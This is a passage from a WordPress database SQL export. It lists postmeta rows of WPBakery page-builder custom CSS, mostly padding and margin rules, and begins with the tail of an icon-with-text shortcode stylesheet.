.soc-icon {\n  color: #ffffff;\n  background: none;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7.layout-1 {\n  grid-template-columns: 60px minmax(0,1fr);\n  grid-column-gap: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7.layout-2 {\n  grid-template-columns: minmax(0,1fr) 60px;\n  grid-column-gap: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7.layout-2 .text-icon {\n  margin-left: 0;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7.layout-3 {\n  grid-template-columns: 60px minmax(0,1fr);\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7.layout-3 .dt-text-title {\n  margin-left: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .dt-text-title,\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .dt-text-title a {\n  color: #311b92;\n  background: none;\n  font-weight: bold;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .dt-text-title {\n  margin-bottom: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-f0dc5fe952c3439ad73b6382808806b7 .dt-text-desc {\n  margin-bottom: 0px;\n}\n\";}'),
(19997,3118,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(19998,3122,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(19999,3123,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20000,3124,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20001,3125,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20002,3126,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20003,3127,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20004,3128,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20005,3129,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20006,3130,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20007,3131,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20008,3132,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20009,3133,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20010,3134,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20011,3135,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20012,3136,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20013,3137,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20014,3138,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20015,3139,'_wpb_shortcodes_custom_css','.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20016,3140,'_wpb_shortcodes_custom_css','.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20017,3141,'_wpb_shortcodes_custom_css','.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1668007755864{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668007768687{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20018,3142,'_wpb_shortcodes_custom_css','.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1668007819032{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668007827903{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20019,3143,'_wpb_shortcodes_custom_css','.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1668007819032{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668007827903{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20020,3144,'_wpb_shortcodes_custom_css','.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1668008113047{padding-bottom: 50px !important;}.vc_custom_1668007819032{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668007827903{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20021,3145,'_wpb_shortcodes_custom_css','.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1668008599218{margin-bottom: 50px !important;border-bottom-width: 50px !important;padding-bottom: 50px !important;}.vc_custom_1668007819032{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668007827903{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20023,3146,'_wpb_shortcodes_custom_css','.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1668008599218{margin-bottom: 50px !important;border-bottom-width: 50px !important;padding-bottom: 50px !important;}.vc_custom_1668008682598{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668008690957{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20024,3148,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009039309{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005400977{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20025,3149,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009039309{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005400977{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20026,3151,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668008877776{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005400977{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20027,3152,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005400977{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20028,3153,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005400977{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010349074{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20029,3154,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20030,3155,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20031,3156,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010595771{margin-top: 10px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20032,3157,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010661475{margin-top: 25px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20033,3158,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1667948825977{margin-top: 25px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
